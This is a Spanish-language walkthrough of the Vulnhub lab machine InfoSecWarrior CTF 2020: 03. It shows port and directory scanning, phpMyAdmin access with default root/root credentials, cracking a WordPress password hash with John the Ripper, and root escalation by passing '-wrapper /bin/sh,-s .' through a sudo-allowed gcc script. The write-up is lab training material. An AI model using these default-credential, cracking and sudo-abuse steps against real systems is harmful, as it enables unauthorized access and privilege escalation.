LaCashita!

[VLN] InfoSecWarrior CTF 2020: 03

Hoy vamos a hackear la maquina de Vulnhub llamada InfoSecWarrior CTF 2020: 03. Podeis descargarla desde el siguiente enlace: Infosec Warrior CTF 2020

Enumeration

Empezamos con un nmap para ver que puertos tiene abiertos.


sml@Cassandra:~$ nmap -A -p- 192.168.1.73
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-30 15:02 CEST
Nmap scan report for ck05.home (192.168.1.73)
Host is up (0.00037s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 
2.0)
| ssh-hostkey: 
|   2048 d8:ad:48:16:27:f8:cc:99:3a:2f:db:c1:a9:d5:3a:d1 (RSA)
|   256 51:06:ab:78:61:f5:4c:03:a0:8f:01:27:f9:17:51:e7 (ECDSA)
|_  256 d5:63:58:ba:2a:d5:d2:17:cb:63:12:34:d6:cd:b6:b9 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: WordPress 5.3.2
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: TEST WORDPRESS – Just another WordPress site
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.81 seconds

Tenemos el puerto 22 y el 80 abiertos. Exploramos un poco mas el puerto 80.


sml@Cassandra:~$ gobuster dir -u http://192.168.1.73 -w 
/usr/share/wordlists/dirb/big.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.73
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/03/30 15:07:35 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/phpMyAdmin (Status: 301)
/server-status (Status: 403)
/wp-content (Status: 301)
/wp-includes (Status: 301)
/wp-admin (Status: 301)
===============================================================
2020/03/30 15:07:38 Finished
===============================================================

De la salida, lo que llama la atencion es que tiene /phpMyAdmin. Entramos en http://192.168.1.73/phpMyAdmin y probamos passwords por defecto como admin/admin admin/password y la que funciona es root/root. Una vez logueados como root en el phpmyadmin, vamos a la BBDD wpdb y dentro de ella vamos a la tabla wp_users, en dicha tabla vemos los siguientes datos: krishna $P$B7CNxePWZrtyQSLKyQirMzEGoX87qx1 Arrancamos John the Ripper para crackear la clave.


sml@Cassandra:~$ echo '$P$B7CNxePWZrtyQSLKyQirMzEGoX87qx1' > crack.txt
sml@Cassandra:~$ john --wordlist=rockyou.txt crack.txt
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Press 'q' or Ctrl-C to abort, almost any other key for status
infosec          (?)
1g 0:00:11:47 DONE (2020-03-30 15:27) 0.001414g/s 10367p/s 10367c/s 10367C/s 
info~1992..infosec
Use the "--show --format=phpass" options to display all of the cracked 
passwords reliably
Session completed

Ya lo tenemos, krishna/infosec. Probamos estos credenciales en SSH.

Low Shell


sml@Cassandra:~$ ssh krishna@192.168.1.73
krishna@192.168.1.73's password: 
krishna@ck05:~$ id
uid=1001(krishna) gid=1001(krishna) groups=1001(krishna)
krishna@ck05:~$ ls
msg.txt
krishna@ck05:~$ cat msg.txt 
I configured wordpress for you and make you admin of it. Your login credentials 
are same as your system login credentials.
krishna@ck05:~$

Miramos si puede ejecutar algo con sudo.


krishna@ck05:~$ sudo -l
Matching Defaults entries for krishna on ck05:
    env_reset, mail_badpass, 
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/
snap/bin

User krishna may run the following commands on ck05:
    (loopspell : ALL) NOPASSWD: /home/loopspell/code_compiler.sh
krishna@ck05:~$

Miramos que hace el script que podemos ejecutar como loopspell.


krishna@ck05:/home/loopspell$ cat code_compiler.sh 
#!/bin/sh
source_code="${1}"
echo "Code is being compiling ..."
/usr/bin/gcc $source_code -o $(mktemp)
echo "You can find your compiled code in /tmp/ directory."

Lo que hace el script es esperar que le pasemos un nombre de fichero y nos lo compila usando gcc. Podemos usar gcc para obtener una shell pasandole los parametros: -wrapper /bin/sh,-s . Sabiendo esto...


krishna@ck05:/home/loopspell$ sudo -u loopspell 
/home/loopspell/code_compiler.sh "-wrapper /bin/sh,-s ."
Code is being compiling ...
$ id
uid=1002(loopspell) gid=1002(loopspell) groups=1002(loopspell)

Ya tenemos una shell como loopspell. Miramos si podemos ejecutar algo con sudo.


$ sudo -l
Matching Defaults entries for loopspell on ck05:
    env_reset, mail_badpass, 
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/
snap/bin

User loopspell may run the following commands on ck05:
    (ALL : ALL) /usr/bin/gcc
    (ALL : ALL) NOPASSWD: /home/loopspell/code_compiler.sh

Podemos ejecutar lo mismo que antes, solo que en este caso podemos hacerlo como root.

Privilege Escalation


$ sudo -u root /home/loopspell/code_compiler.sh "-wrapper /bin/sh,-s ."         
    
Code is being compiling ...
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls
root.txt
# cat root.txt
_________        ___.                 ____  __.      .__       .__     __    
_______   .________
\_   ___ \___.__.\_ |__   ___________|    |/ _| ____ |__| ____ |  |___/  |_  \  
 _  \  |   ____/
/    \  \<   |  | | __ \_/ __ \_  __ \      <  /    \|  |/ ___\|  |  \   __\ /  
/_\  \ |____  \ 
\     \___\___  | | \_\ \  ___/|  | \/    |  \|   |  \  / /_/  >   Y  \  |   \  
\_/   \/       \
 \______  / ____| |___  /\___  >__|  |____|__ \___|  /__\___  /|___|  /__|    
\_____  /______  /
        \/\/          \/     \/              \/    \/  /_____/      \/          
    \/       \/ 


flag = efa4c284b8e2a15674dfb369384c8bcf

This flag is a proof that you get the root shell.

Tag me on Twitter with @CyberKnight00

End

Y con esto ya seriamos root de la maquina :)